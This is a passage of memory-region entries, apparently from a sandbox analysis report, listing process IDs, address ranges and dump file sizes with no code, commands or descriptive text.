                                                                                                                                                                                                                                                                                                                                    • memory/3948-190-0x0000000000170000-0x0000000000171000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3948-247-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3948-397-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4140-185-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4140-200-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                                                                                                    • memory/4264-393-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4264-412-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4264-420-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-257-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-308-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-286-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-294-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4368-236-0x0000000003940000-0x000000000397C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      240KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-348-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-275-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-340-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-261-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-237-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-258-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-276-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-364-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-281-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-365-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-278-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-266-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-270-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-317-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4368-343-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4380-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4408-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4408-228-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      12KB

                                                                                                                                                                                                                                                                                                                                    • memory/4416-399-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4464-361-0x000001F126B70000-0x000001F126C3F000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      828KB

                                                                                                                                                                                                                                                                                                                                    • memory/4464-350-0x000001F126B00000-0x000001F126B6F000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      444KB

                                                                                                                                                                                                                                                                                                                                    • memory/4464-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4580-490-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4616-385-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4616-392-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                                                                                                    • memory/4636-321-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4640-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4700-379-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4720-404-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4808-406-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4848-347-0x0000000005370000-0x000000000586E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5.0MB

                                                                                                                                                                                                                                                                                                                                    • memory/4848-285-0x000000000041905A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4848-280-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                                                                    • memory/4880-384-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4880-400-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                                                                                                    • memory/4884-600-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4892-298-0x0000000000418E52-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4892-288-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                                                                    • memory/4892-355-0x0000000005210000-0x0000000005816000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                                                                                                    • memory/4908-360-0x0000000005360000-0x0000000005966000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                                                                                                    • memory/4908-289-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                                                                    • memory/4908-299-0x0000000000418F7A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4932-345-0x0000000002540000-0x0000000002541000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4932-303-0x0000000000418F76-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5000-265-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5008-407-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5076-391-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5132-409-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5368-421-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5380-486-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5432-491-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5568-438-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5580-552-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5720-509-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5756-514-0x00007FF774F54060-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/6104-470-0x0000000000000000-mapping.dmp